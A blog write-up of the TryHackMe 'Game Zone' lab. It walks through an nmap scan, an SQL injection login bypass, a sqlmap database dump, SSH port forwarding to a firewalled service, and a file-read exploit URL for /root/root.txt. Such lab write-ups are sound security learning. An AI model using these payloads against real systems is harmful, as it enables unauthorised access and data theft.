Post

GameZone-writeup-THM

Posted Updated
Preview Image
By Simone Felici 2 min read

My writeup of the TryHackMe room “Game Zone

We are going to startwith a scan:

1
2
3
4
5
6
7
8
9
10
11
12

nmap <your_ip>

Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 10:50 EST
Nmap scan report for 10.10.108.222
Host is up (0.060s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE    SERVICE
22/tcp  open     ssh
80/tcp  open     http
259/tcp filtered esro-gen

Nmap done: 1 IP address (1 host up) scanned in 9.93 seconds

First of all we access the web page and see the hitman,

if you don’t know his name, just use google images.

Then we see a login page, and try using SQLi

We do this by adding ' or 1=1 — - instead of the username

By doing this we can access the site.

Now we are going to use sqlmap to dump the entire database!

Before that we need to capture the request with burp.

You can do that just by

  • activating the proxy,
  • capturing the request in the game zone portal
  • copy it into a txt file,
  • And put it into sqlmap like that:
1

sqlmap -r request.txt --dbms=mysql --dump --threads=5

Now that we have a username and password, I am going to use ssh.

Then we will use a tool called ss to investigate sockets running on a host.

If we run ss -tulpn it will tell us what socket connections are running

ArgumentDescription
-tDisplay TCP sockets
-uDisplay UDP sockets
-lDisplays only listening sockets
-pShows the process using the socket
-nDoesn’t resolve service names

We see that is running a servvice on port 10000 but is filtered by the firewall.

So we go back to our machine and run ssh -L 10000:localhost:10000 <username>@<ip>

Once we are in we can open our browser and go to localhost:1000,

here we are met with a login page.

I just use the credential that we altready have and they worked.

After that we just need to use metasploit, to search the exploit and run it using the options that he wants.

I’ve tried for long enough to make it work but I didn’t succeded,

in the end I searched in Exploit DB and read what the exploit does, I found out that it just allows you to exeute arbitrary commands in the /file/show.cgi component

Viewing the hint I know that the flag is in root.txt, so I just had to do this:

1

http://localhost:10000/file/show.cgi/root/root.txt
room, easy
linux sqli
This post is licensed under CC BY 4.0 by the author.